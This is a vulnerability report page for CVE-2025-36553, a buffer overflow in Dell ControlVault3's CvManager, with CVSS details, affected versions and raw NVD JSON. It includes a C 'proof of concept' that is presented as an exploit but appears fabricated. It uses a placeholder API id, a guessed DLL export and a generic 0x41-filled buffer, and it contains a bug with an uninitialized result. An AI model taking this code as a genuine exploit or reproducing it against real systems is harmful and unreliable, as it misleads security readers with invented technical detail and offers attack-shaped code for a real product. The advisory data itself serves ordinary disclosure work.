Security Vulnerability Report
CVE-2025-36553 CVSS 8.8 HIGH

CVE-2025-36553

Published: 2025-11-17 23:15:54
Last Modified: 2026-04-15 00:35:42

Description

A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data available. Affected versions, as stated in the description:

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-36553 PoC - Dell ControlVault3 Buffer Overflow // Target: Dell ControlVault3 CvManager // CVSS: 8.8 (High) #include <windows.h> #include <stdio.h> // ControlVault API definitions #define CV_API_TRIGGER_VULN 0x12345678 typedef struct { DWORD api_id; DWORD input_length; PVOID input_data; DWORD output_length; PVOID output_data; } CV_API_REQUEST; // Trigger buffer overflow in CvManager BOOL trigger_cve_2025_36553(HMODULE hVault) { CV_API_REQUEST request; DWORD result; // Prepare oversized input to trigger overflow DWORD payload_size = 0x10000; // 64KB - exceeds buffer limit BYTE* payload = (BYTE*)malloc(payload_size); if (!payload) return FALSE; // Fill payload with controlled data memset(payload, 0x41, payload_size); // Craft API request request.api_id = CV_API_TRIGGER_VULN; request.input_length = payload_size; request.input_data = payload; request.output_length = 0x100; request.output_data = malloc(0x100); // Get CvManager function pointer typedef DWORD (*CvManager_Call)(CV_API_REQUEST*); CvManager_Call CvCall = (CvManager_Call)GetProcAddress(hVault, "CvManagerCall"); if (CvCall) { // Trigger vulnerability result = CvCall(&request); } free(payload); free(request.output_data); return (result == 0); } int main() { HMODULE hVault = LoadLibrary("CvManager.dll"); if (hVault) { trigger_cve_2025_36553(hVault); FreeLibrary(hVault); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36553", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:54.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an api call to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2189", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2189", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}